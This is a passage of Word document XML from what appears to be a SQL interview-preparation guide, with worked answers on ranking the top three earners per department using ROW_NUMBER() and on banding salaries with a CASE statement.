          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>department_name?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647BE63B" w14:textId="6B38AB77" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To find the top 3 highest-earning employees in each department, we can use the ROW_NUMBER() window function in SQL, which helps assign a unique row number to each row in a result set based on a specified order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C49FE"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Here’s an SQL query that selects the 3 highest-earning employees in each department:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF3F9C"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WITH RankedEmployees AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C680F34"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SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1C035A"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e.employee_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B955C8"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e.first_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411CBB70"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        e.last_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064F931B"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e.department_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB1700"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e.salary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E2A93"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e.hire_date,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF41F7F"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d.department_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726919A9"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ROW_NUMBER() OVER (PARTITION BY e.department_id ORDER BY e.salary DESC) AS row_num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A5005"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FROM Employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACB1C0"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JOIN Departments d ON e.department_id = d.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772BD5BC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B375F8"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SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1A1DA"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employee_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B2494"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first_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26670953"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last_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD7A89"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department_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2BB41"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salary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C66C28"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hire_date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2FEF34"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FROM RankedEmployees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF89254"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WHERE row_num &lt;= 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1284D8"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ORDER BY department_id, row_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F349F" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1612B605"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WITH RankedEmployees AS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This creates a Common Table Expression (CTE) called RankedEmployees. It assigns a row number to each employee based on their salary within each department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD93C3" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ROW_NUMBER() OVER (PARTITION BY e.department_id ORDER BY e.salary DESC)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This window function assigns a unique number to each employee, partitioned by department_id (to reset the row number for each department), and ordered by salary in descending order (so the highest salary gets row number 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A97A6"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ELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In the outer query, we filter out the top 3 employees from each department by selecting rows where row_num &lt;= 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318A627"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We order the result by department_id and row_num to list employees by department and ensure that the top 3 employees for each department are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB00C2" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248DD1A"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The query will return the top 3 highest-earning employees in each department along with their employee details, sorted by department and salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B493BDD" w14:textId="5D2E5D65"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4BC19999">
          <v:rect id="_x0000_i3049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFB05D" w14:textId="65E681CA" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="750" w:name="_Toc196308230"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="002E5BA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="002E5BA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>that categorizes employees based on their salary into different percentage ranges.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="750"/>
    </w:p>
    <w:p w14:paraId="52ADCDB4" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>emp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B95E36" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>id Name Salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12602612" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>1 A 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA13C1C" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>2 B 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BC128" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>3 C 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E0434" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>4 D 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7435A6" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5 E 70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B1DC3" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>6 F 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F19071" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F0749" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>id name sal Percentage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000732E5" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>2 B 100 greater than 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F383796" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>5 E 70 greater than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB93868" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>4 D 60 greater than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5B6C3" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>1 A 40 less than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C312D89" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>3 C 10 less than 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC9A50" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>6 F 5 less than 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8DC14" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>--4 cate--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0FF68E" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>greater than 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25729934" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>greater than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C1DC8" w14:textId="77777777" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>less than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52C2A9" w14:textId="26BF5CD9" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>less than 10</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48E681" w14:textId="57AFD0C9" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To categorize employees based on their salary into different percentage ranges, you can use a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement in SQL. This allows you to create conditional logic to categorize the employees into different salary ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BFDA12"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Here’s the SQL query that categorizes employees based on the specified salary ranges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691DE471"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SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD19F37"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id, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5C47E"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name, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFE281"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salary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25012257"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CASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F3547"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WHEN salary &gt; 90 THEN 'greater than 90'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBBE30"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WHEN salary &gt; 50 THEN 'greater than 50'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BBDF4C"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WHEN salary &gt;= 10 THEN 'less than 50'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697258B9"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ELSE 'less than 10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2A38C"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END AS percentage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600912BD"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FROM emp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720D78B" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F9C524"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CASE Statement</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is used to categorize the salary into different ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CC129" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9"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WHEN salary &gt; 90 THEN 'greater than 90': This condition checks if the salary is greater than 90.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325AF585" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9"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WHEN salary &gt; 50 THEN 'greater than 50': This checks if the salary is greater than 50 but less than or equal to 90.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689CEEC" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9"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WHEN salary &gt;= 10 THEN 'less than 50': This checks if the salary is greater than or equal to 10 but less than or equal to 50.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD42B3F" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELSE 'less than 10': This condition is for salaries less than 10.</w:t>
      </w:r>
